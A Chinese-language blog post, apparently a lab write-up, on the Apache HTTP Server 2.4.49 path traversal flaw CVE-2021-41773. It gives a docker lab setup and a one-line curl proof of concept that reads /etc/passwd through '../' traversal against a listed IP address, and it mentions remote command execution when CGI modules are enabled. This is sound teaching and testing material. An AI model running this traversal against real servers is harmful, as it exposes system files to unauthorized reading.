常见中间件漏洞之四:Apache

1. CVE-2021-41773

Apache HTTP Server 路径穿越漏洞

漏洞简介

该漏洞是由于Apache HTTP Server 2.4.49版本存在⽬录穿越漏洞,在路径穿越⽬录<Directory/>Require all granted</Directory>允许被访问的的情况下(默认开启),攻击者可利⽤该路径穿越漏洞读取到Web⽬录之外的其他⽂件

在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执⾏任意cgi命令(RCE)

影响版本

Apache HTTP Server 2.4.49

某些Apache HTTPd 2.4.50也存在此漏洞

环境搭建

docker pull blueteamsteve/cve-2021-41773:no-cgid

漏洞复现

http://8.138.19.182:8082/

1.使⽤poc

curl http://8.138.19.182:8082/cgi-bin/../../../../etc/passwd

2.⼯具验证

3.在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执⾏任意cg命令

相关推荐
ljh123321ljh4 小时前
常见框架漏洞—Thinkphp
java·网络安全·中间件·tomcat·firefox
瑜舍5 小时前
Apache Tomcat RCE漏洞(CVE-2025-24813)
java·tomcat·apache
故事与他64513 小时前
Thinkphp(TP)框架漏洞攻略
android·服务器·网络·中间件·tomcat
追风少年15513 小时前
常见中间件漏洞之一 ----【Tomcat】
java·中间件·tomcat
DustEss72617 小时前
中间件漏洞之tomcat
java·网络安全·中间件·tomcat
与神明画鸭17 小时前
常见中间件漏洞:Tomcat篇
java·中间件·tomcat
PagiHi18 小时前
好消息!软航文档控件(NTKO WebOffice)在Chrome 133版本上提示扩展已停用的解决方案
前端·chrome·中间件·js·activex
老马啸西风21 小时前
Layotto 是一款使用 Golang 开发的应用运行时,旨在帮助开发人员快速构建云原生应用
开发语言·后端·阿里云·云原生·中间件·golang
CopyLower1 天前
Apache Dubbo 与 ZooKeeper 集成:服务注册与发现的全解析
zookeeper·apache·dubbo
Hello.Reader1 天前
Apache Dubbo Pixiu打造微服务生态的轻量级 API 网关
微服务·apache·dubbo